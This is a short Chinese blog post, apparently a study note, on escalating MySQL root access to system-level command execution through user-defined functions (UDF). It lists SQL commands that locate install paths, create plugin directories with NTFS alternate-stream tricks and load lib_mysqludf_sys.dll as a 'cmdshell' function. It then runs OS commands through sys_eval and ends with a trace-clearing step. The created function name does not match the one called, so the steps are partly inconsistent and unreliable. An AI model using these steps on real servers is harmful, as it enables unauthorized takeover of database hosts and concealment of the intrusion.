Day2——提权学习之MySQL数据库(UDF提权)

0x00 原理

UDF(user-defined function)是MySQL的一个拓展接口,也可称之为用户自定义函数,它是用来拓展MySQL的技术手段,可以说是数据库功能的一种扩展。
通过在udf文件中定义新函数,对MYSQL的功能进行扩充,可以执行系统任意命令,将MYSQL账号root转化为系统system权限。

0x01 利用条件

  1. mysql版本大于5.1,udf.dll文件必须放置在mysql安装目录的lib\plugin文件夹下

  2. mysql版本小于5.1, udf.dll文件在windows server 2003下放置于c:\windows\system32目录,在windows server 2000下放置在c:\winnt\system32目录。

  3. 掌握mysql数据库的账户,从拥有对mysql的insertdelete权限,以创建和抛弃函数。拥有可以将udf.dll写入相应目录的权限。

  4. 可以将udf.dll写入到相应目录的权限。

0x02 提权关键

导出UDF文件到指定路径

0x03 提权步骤

1、获取数据库版本、数据位置以及插件位置等信息

select version();//获取数据库版本 
select user();//获取数据库用户 
select @@basedir ;//获取安装目录 
show variables like '%plugins%'; //寻找mysql安装路径 

2、导出UDF文件
关于UDF文件:
sqlmap中有现成的udf文件,分为32位和64位,一定要选择对版本
关于路径:

MySQL<5.0,导出路径随意;
5.0 <= MySQL<5.1,则需要导出至目标服务器的系统目录(如:c:/windows/system32/)
MySQL 5.1以上版本,必须要把udf.dll文件放到MySQL安装目录下的lib\plugin文件夹下才能创建自定义函数。

用NTFS ADS流模式突破进而创建文件夹

select @@basedir;  //查找到mysql的目录
select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib::$INDEX_ALLOCATION';    //利用NTFS ADS创建lib目录
select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin::$INDEX_ALLOCATION';    //利用NTFS ADS创建plugin目录

3、创建cmdshell 函数

create function cmdshell returns string soname ‘lib_mysqludf_sys.dll’; 

4、执行自定义函数

select sys_eval(‘whoami’); 

5、清除痕迹

drop function cmdshell

0x04 参考

https://www.cnblogs.com/R4v3n/articles/8722657.html
《网络攻防实战研究——漏洞利用与提权》

posted @ 2019-12-20 09:12  吃不胖的ruanruan  阅读(326)  评论(0编辑  收藏  举报